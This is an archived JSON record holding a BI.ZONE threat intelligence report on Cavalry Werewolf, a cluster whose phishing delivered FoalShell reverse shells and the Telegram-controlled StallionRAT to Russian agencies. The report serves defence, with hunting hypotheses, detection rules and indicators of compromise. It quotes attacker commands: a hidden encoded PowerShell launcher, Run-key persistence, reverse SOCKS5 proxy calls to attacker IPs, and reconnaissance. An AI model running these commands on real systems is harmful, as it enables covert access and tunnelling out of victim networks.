{
	"id": "eec2b85f-ea07-4fd4-b54e-3e7f8b47afb2",
	"created_at": "2026-04-06T00:10:23.314523Z",
	"updated_at": "2026-04-10T13:11:50.274115Z",
	"deleted_at": null,
	"sha1_hash": "e95ee1309360759482c515f00491c6b9fec388ad",
	"title": "Cavalry Werewolf raids Russia’s public sector with trusted relationship attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2712169,
	"plain_text": "Cavalry Werewolf raids Russia’s public sector with trusted relationship attacks\r\nBy BI.ZONE\r\nPublished: 2025-10-02 · Archived: 2026-04-05 14:37:00 UTC\r\nBI.ZONE Threat Intelligence recorded Cavalry Werewolf* activity from May to August 2025. To gain initial access, the attackers sent out targeted phishing emails disguised as official correspondence from Kyrgyz government officials. The main targets of the attacks were Russian state agencies, as well as energy, mining, and manufacturing enterprises.\r\nCavalry Werewolf relied on malware of its own design: FoalShell reverse shells and StallionRAT (remote access trojans) controlled via Telegram.\r\n*Aliases: YoroTrooper, SturgeonPhisher, Silent Lynx, Comrade Saiga, Tomiris, ShadowSilk\r\nKey findings\r\nCavalry Werewolf is actively experimenting with expanding its arsenal. This highlights the importance of having quick insights into the tools used by the cluster; otherwise it would be impossible to maintain up-to-date measures to prevent and detect such attacks.\r\nAttackers can not only impersonate officials but also actually compromise their email accounts for phishing. Therefore, it is critical to carefully check both the sender and the content: text, links, and attachments.\r\nEven if attacks are not made public, that does not mean they do not exist. Cyber intelligence portals allow for quick access to up-to-date information about the cyber threat landscape in the region and effective prioritization of defenses.\r\nCampaign\r\nPhishing\r\nIn their targeted phishing campaigns against Russian organizations, Cavalry Werewolf used fake email addresses of employees from Kyrgyz agencies, for example:\r\nMinistry of Economy and Commerce\r\nMinistry of Culture, Information, Sports and Youth Policy\r\nMinistry of Transport and Communications\r\nThe phishing emails contained a RAR archive with either FoalShell or StallionRAT malware.\r\nhttps://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef\r\nPage 1 of 16\r\nIn one of the phishing mailings, the attackers used a real email address found on the website of the Kyrgyz Republic’s regulatory authority. It is likely that the attackers had compromised this address earlier to use in future attacks.\r\nExamples of phishing emails\r\nThreat hunting\r\nWhen searching for threats, you can track the creation of suspicious archives with names similar to document names in the %LocalAppData%\\Microsoft\\Windows\\INetCache\\Content.Outlook directory. This folder stores files downloaded to the Outlook client on a user’s host.\r\nFoalShell\r\nFoalShell is a simple reverse shell used by Cavalry Werewolf, written in Go, C++, and C#. FoalShell allows attackers to execute arbitrary commands in the cmd.exe command line interpreter on a compromised host.\r\nFoalShell C#\r\nThe source code of the .NET application is simple: essentially, it is a standard reverse shell that operates via cmd with input and output stream redirection. As a result, the attacker gains access to the command line on the victim's remote device and can execute any command. The cmd.exe window runs in hidden mode. If input/output errors or socket failures occur, the application automatically terminates.\r\nKnown file names:\r\nО результатах трёх месяцев совместной работы [redacted].exe (three-month results of joint operations)\r\nСписок сотрудников выдвинутых к премии ко Дню России.exe.exe (shortlist of employees to receive bonuses)\r\nПриказ о поощрении сотрудников ко дню России (Т-11а) №1 от 30.05.2025.exe (employee incentive order)\r\nО ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe (information to be provided prior to a meeting)\r\nО работе почтового сервера план и проведенная работа.exe (scheduled and completed works on the mail server)\r\nО проведении личного приема граждан список участников.exe (list of attendants to conduct appointments with the citizens)\r\nСлужбеная записка от 16.06.2025___________________________.exe (memo)\r\nDetected PDB paths:\r\nC:\\Users\\yaadzrr\\Documents\\reverseShells\\Reverse-Shell-CS\\Payload\\Real_cli\\obj\\Release\\Docu_rsnet.pdb\r\nC:\\Users\\yueying\\Documents\\reverseShells\\Reverse-Shell-CS\\Payload\\Real_cli\\obj\\Release\\NetChecker.pdb\r\nC# code snippet from FoalShell reverse shell\r\nUsing the build ID 8923c4d9-3fbf-4cf3-8a63-c5102293b774, namespace, and code structure, we were able to find the GitHub repository* with the original design used as the basis for this malware.\r\n* “xcyraxx/Reverse-Shell-CS,” GitHub\r\nFoalShell Cpp\r\nHere, the adversaries used a C++ launcher containing a shellcode and an obfuscated FoalShell reverse shell inside a resource called output_bin. When started, the launcher reads the resource and allocates a memory region using the WinAPI function VirtualAlloc with RWE permissions. The resource contents are then copied to the allocated memory and the shellcode is executed; it deobfuscates the main reverse shell code and transfers control to it using the WinAPI function ZwResumeThread.\r\nKnown file names:\r\nО работе почтового сервера план и проведенная работа.exe (scheduled and completed works on the mail server)\r\nПрограммный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe (UNO Drugs and Crime Office)\r\nПлан-протокол встречи о сотрудничестве представителей должн.лиц.exe (meeting agenda for cooperation between officials)\r\nАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe (classification of projects in the Siberian Federal District)\r\nИнформация по письму в МИД от 6 июля статус и прилагаемые документы.exe (letter and attachments to the Ministry of Internal Affairs)\r\nО проведении личного приема граждан список участников план и проведенная работа.exe (list of attendants to conduct appointments with the citizens)\r\nPDB path:\r\nC:\\Users\\Professional\\Source\\Repos\\bin_loader\\x64\\Release\\bin_loader.pdb\r\noutput_bin resource with FoalShell Cpp reverse shell payload\r\nThe main reverse shell code uses network sockets, runs cmd.exe in hidden mode, and redirects input/output streams to the console, allowing the cluster to execute arbitrary commands on the victim's remote host.\r\nMain FoalShell Cpp reverse shell code\r\nFoalShell Go\r\nThis version of the reverse shell, implemented in Go, establishes a connection with a remote control server and provides the attackers with hidden access to the command line of the victim’s computer.\r\nKnown file names:\r\nСлужебная записка от 20.08.2025[multiple spaces].exe (memo)\r\nСлужебная записка от 12.08.2025[multiple spaces].exe (memo)\r\nАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe (classification of projects in the Siberian Federal District)\r\nProject path:\r\nC:\\source\\repos\\ggg\r\nGo code snippet from FoalShell reverse shell\r\nThreat hunting\r\nIdea for hypothesis\r\nWhen searching for threats, monitor processes with the executable file cmd.exe launched by a suspicious parent process. These may include:\r\nprocesses typically used by malicious actors and stored in the following folders:\r\n— %Temp%\r\n— %LocalAppData%\r\n— %AppData%\\Roaming\r\n— C:\\Users\\Public\r\n— %UserProfile%\\Downloads\r\n— %UserProfile%\\Desktop\r\nparent processes with a short lifetime on the host\r\nprocesses with names mimicking document names\r\nStallionRAT\r\nThis is a group of remote access trojans written in Go, PowerShell, and Python, used by Cavalry Werewolf. StallionRAT allows attackers to execute arbitrary commands, load additional files, and exfiltrate collected data. The cluster uses a Telegram bot as their C2 server.\r\nKnown file names:\r\nАппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe (classification of projects in the Siberian Federal District)\r\nDiscovered PDB path:\r\nC:\\Users\\Admin\\source\\repos\\ConsoleApplication3\\x64\\Release\\ConsoleApplication3.pdb\r\nIn this campaign, the attackers employed a launcher written in C++ to run an instance of the StallionRAT malware in PowerShell. The launcher executes PowerShell with a Base64-encoded command.\r\nThe command line argument format is as follows:\r\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand JABjAGgAYQB0AF8AaQBkACAAPQAgAC\r\nThe execution of this PowerShell command launches StallionRAT, which is controlled via Telegram.\r\nThreat detection\r\nTo detect suspicious activity, you can configure a correlation rule for powershell.exe process runs with the -EncodedCommand parameter, as attackers often use Base64 encoding to bypass security mechanisms and correlation rules. This activity may also be typical for administrators, but such actions can be excluded from the correlation rule.\r\nThreat hunting\r\nTo detect threats related to this activity, search for powershell.exe startup events with the parameters -WindowStyle Hidden and -ExecutionPolicy Bypass. These parameters can be used by the adversary to secretly run code and bypass defenses. However, unlike the detection idea above, many legitimate programs also use these parameters, which are quite difficult to filter out on a regular basis.\r\nAt the initialization stage, StallionRAT assigns a DeviceID to the compromised host. DeviceID is a random number between 100 and 10,000. The malware also obtains the computer name using $env:COMPUTERNAME.\r\nIn an infinite loop (while True), the getUpdates function is constantly called to receive new commands and messages from the Telegram bot. The results of command execution and error messages are sent to a designated Telegram chat specified in the StallionRAT code.\r\nRAT commands:\r\n/list receives a list of compromised hosts connected to the C2. Returns a list containing the DeviceID and computer name.\r\n/go [DeviceID] [command] executes the given command using Invoke-Expression.\r\n/upload [DeviceID] loads a file to the victim's device via Download-TelegramFile and saves it to C:\\Users\\Public\\Libraries\\%fileName%.\r\nStallionRAT code snippet responsible for command execution\r\nAfter examining additional information, we discovered commands executed by StallionRAT on one of the compromised hosts with the ID 9139. These commands indicate that the RAT was delivered to the C:\\Users\\Public\\Libraries directory and added to startup through the Run registry key:\r\n'win.exe' successfully uploaded \u003e\u003e C:\\Users\\Public\\Libraries\\win.exe.\r\n/go9139 REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinRVN /t REG_SZ /d C:\\users\\pu\r\nFurthermore, the identified commands presented below indicate the use of SOCKS5 proxying tools: ReverseSocks5Agent and ReverseSocks5*.\r\n* “Acebond/ReverseSocks5: Single executable reverse SOCKS5 proxy written in Golang,” GitHub\r\n/go9139 C:\\users\\public\\libraries\\rev.exe -pcl 96.9.125[.]168:443\r\n/go9139 C:\\users\\public\\libraries\\rev.exe -pcl 78.128.112[.]209:10443\r\n/go9139 C:\\users\\public\\libraries\\revv2.exe -connect 96.9.125[.]168:443\r\n/go9139 C:\\users\\public\\libraries\\revv2.exe -connect 78.128.112[.]209:10443\r\nIn addition, there were commands executed to collect information about the compromised host:\r\n/go9139 ipconfig /all\r\n/go9139 netstat\r\n/go9139 whoami\r\n/go9139 ls C:\\users\\public\\libraries\r\n/go9139 ping 10.70.70.10\r\n/go9139 net user /dom\r\nThreat hunting\r\nWhen searching for the suspicious activity described above, focus on the following hypotheses:\r\nsearch for and analyze file create events in the C:\\Users\\Public\\Libraries\\ folder, as well as process launch events in the said folder\r\nsearch for suspicious additions of files to the \\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key, made by using the reg.exe registry utility with the add command, or leverage the registry modification tracking functionality offered by EDR solutions, among others\r\nsearch for environment exploration events with commands such as whoami, netstat, ipconfig, which are run by suspicious parent processes and users who have never applied such commands before\r\nAnalysis of additional information\r\nThe investigation revealed additional information related to Cavalry Werewolf preparing for attacks and testing malicious programs.\r\nIn the first case, the discovered files indicate preparations for an attack against Russian companies, as well as a file in the Tajik language C:\\Users\\Admin\\Desktop\\Номерхои коргархо new.rar, which may be evidence of the attackers also targeting Tajikistan.\r\nBesides, there is reason to believe that, in addition to the identified malware, the attackers may have used other tools, such as AsyncRAT. This is indicated by the path: C:\\Users\\Admin\\Desktop\\Async Rust RAT_0.1.0_x64_en-US.msi.\r\nFile paths on the adversary’s computer\r\nIn the second case, besides the files named in English, we found files named in Arabic. This suggests that the attackers might be targeting countries in the Middle East. Thus, the span of Cavalry Werewolf attacks is quite broad and not limited to Russia, other CIS countries, and regions where their malicious activity has been recorded.\r\nFile paths on the adversary’s computer\r\nIndicators of compromise\r\nArchives\r\n27a11c59072a6c2f57147724e04c7d6884b52921da2629fb0807e0bb93901cbc\r\n3cd7f621052919e937d9a2fdd4827fc7f82c0319379c46d4f9b9dd5861369ffc\r\nc3df16cce916f1855476a2d1c4f0946fa62c2021d1016da1dc524f4389a3b6fa\r\ne15f1a6d24b833ab05128b4b34495ef1471bd616b9833815e2e98b8d3ae78ff2\r\ndae3c08fa3df76f54b6bae837d5abdc309a24007e9e6132a940721045e65d2bb\r\n8404f8294b14d61ff712b60e92b7310e50816c24b38a00fcc3da1371a3367103\r\n8e6d7c44ab66f37bf24351323dc5e8d913173425b14750a50a2cbea6d9e439ba\r\nfa6cdd1873fba54764c52c64eadca49d52e5b79740364ef16e5d86d61538878d\r\n0e7b65930bc73636f2f99b05a3bb0af9aaf17d3790d0107eb06992d25e62f59d\r\nc9ffbe942a0b0182e0cd9178ac4fbf8334cae48607748d978abf47bd35104051\r\n04769b75d7fb42fbbce39d4c4b0e9f83b60cc330efa477927e68b9bdba279bb8\r\n7da82e14fb483a680a623b0ef69bcfbd9aaaedf3ec26f4c34922d6923159f52f\r\nFoalShell\r\nc26b62fa593d6e713f1f2ccd987ef09fe8a3e691c40eb1c3f19dd57f896d9f59\r\n1dfe65e8dc80c59000d92457ff7053c07f272571a8920dbe8fc5c2e7037a6c98\r\na8ada7532ace3d72e98d1e3c3e02d1bd1538a4c5e78ce64b2fe1562047ba4e52\r\ncc9e5d8f0b30c0aaeb427b1511004e0e4e89416d8416478144d76aa1777d1554\r\nec80e96e3d15a215d59d1095134e7131114f669ebc406c6ea1a709003d3f6f17\r\n8e7fb9f6acfb9b08fb424ff5772c46011a92d80191e7736010380443a46e695c\r\nb13b83b515ce60a61c721afd0aeb7d5027e3671494d6944b34b83a5ab1e2d9f4\r\naf3d740c5b09c9a6237d5d54d78b5227cdaf60be89f48284b3386a3aadeb0283\r\n4f17a7f8d2cec5c2206c3cba92967b4b499f0d223748d3b34f9ec4981461d288\r\n22ba8c24f1aefc864490f70f503f709d2d980b9bc18fece4187152a1d9ca5fab\r\n148a42ccaa97c2e2352dbb207f07932141d5290d4c3b57f61a780f9168783eda\r\n7084f06f2d8613dfe418b242c43060ae578e7166ce5aeed2904a8327cd98dbdf\r\nab0ad77a341b12cfc719d10e0fc45a6613f41b2b3f6ea963ee6572cf02b41f4d\r\n6b290953441b1c53f63f98863aae75bd8ea32996ab07976e498bad111d535252\r\nStallionRAT\r\ncc84bfdb6e996b67d8bc812cf08674e8eca6906b53c98df195ed99ac5ec14a06\r\nReverseSocks5\r\nfbf1bae3c576a6fcfa86db7c36a06c2530423d487441ad2c684cfeda5cd19685\r\nReverseSocks5Agent\r\na3ec2992e6416a3af54b3aca3417cf4a109866a07df7b5ec0ace7bd1bf73f3c6\r\nNetwork indicators\r\n188.127.225[.]191:443\r\n94.198.52[.]200:443\r\n91.219.148[.]93:443\r\n185.244.180[.]169:443\r\n109.172.85[.]95:443\r\n185.231.155[.]111:443\r\n185.173.37[.]67:443\r\n188.127.227[.]226:443\r\n62.113.114[.]209:443\r\n96.9.125[.]168:443\r\n78.128.112[.]209:10443\r\nMITRE ATT\u0026CK\r\nDetection\r\nThe BI.ZONE TDR rules below can help organizations detect the described malicious activity:\r\nwin_suspicious_powershell_encoded_command\r\ngen_ti_wolfs_network_ioc_was_detected\r\ngen_ti_wolfs_hash_was_detected\r\nwin_discovery_owner_and_users_system\r\nwin_discovery_system_network_configuration\r\nwin_discovery_network_connections\r\nwin_th_start_hidden_powershell\r\nHow to protect your company from such threats\r\nPhishing still ranks first among the attack vectors: adversaries rely on the recipient’s carelessness to distribute malware via emails.\r\nYou can leverage dedicated services such as BI.ZONE Mail Security to filter out unwanted messages and protect your email communications. Immediately after installation, more than 100 protection mechanisms are activated: against spam, phishing, spoofing, mail server vulnerabilities, and malware attacks. Filtering uses statistical, signature, linguistic, content, heuristic analysis, and machine vision. The ML model accurately classifies emails by content and adjusts their ratings. As a result, illegitimate emails are blocked, while secure emails are delivered without delay.\r\nTo build effective cyber defense, it is essential to understand which threats are relevant to your organization. BI.ZONE Threat Intelligence can greatly simplify this task. The portal provides information about the current attacks, threat actors, their methods, tools, as well as data from underground resources. This intelligence helps you stay proactive and accelerate your incident response.\r\nSource: https://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://bi-zone.medium.com/cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef"
	],
	"report_names": [
		"cavalry-werewolf-raids-russias-public-sector-with-trusted-relationship-attacks-e19f7a5c83ef"
	],
	"threat_actors": [
		{
			"id": "493c47f7-b265-4b10-95de-d86af942c543",
			"created_at": "2023-04-27T02:04:45.385041Z",
			"updated_at": "2026-04-10T02:00:04.939878Z",
			"deleted_at": null,
			"main_name": "Tomiris",
			"aliases": [],
			"source_name": "ETDA:Tomiris",
			"tools": [
				"JLOGRAB",
				"JLORAT",
				"Kapushka",
				"KopiLuwak",
				"Meterpreter",
				"QUIETCANARY",
				"RATel",
				"RocketMan",
				"Roopy",
				"Telemiris",
				"Tomiris",
				"Topinambour",
				"Tunnus",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c416152c-d268-40a3-8887-01d2ec452b7c",
			"created_at": "2023-04-27T02:04:45.481771Z",
			"updated_at": "2026-04-10T02:00:04.987067Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Silent Lynx"
			],
			"source_name": "ETDA:YoroTrooper",
			"tools": [
				"Loda",
				"Loda RAT",
				"LodaRAT",
				"Meterpreter",
				"Nymeria",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "322248d6-4baf-4ada-af8e-074bc6c10132",
			"created_at": "2023-11-05T02:00:08.072145Z",
			"updated_at": "2026-04-10T02:00:03.397406Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Comrade Saiga",
				"Salted Earth",
				"Sturgeon Fisher",
				"ShadowSilk",
				"Silent Lynx",
				"Cavalry Werewolf",
				"SturgeonPhisher"
			],
			"source_name": "MISPGALAXY:YoroTrooper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434223,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e95ee1309360759482c515f00491c6b9fec388ad.pdf",
		"text": "https://archive.orkl.eu/e95ee1309360759482c515f00491c6b9fec388ad.txt",
		"img": "https://archive.orkl.eu/e95ee1309360759482c515f00491c6b9fec388ad.jpg"
	}
}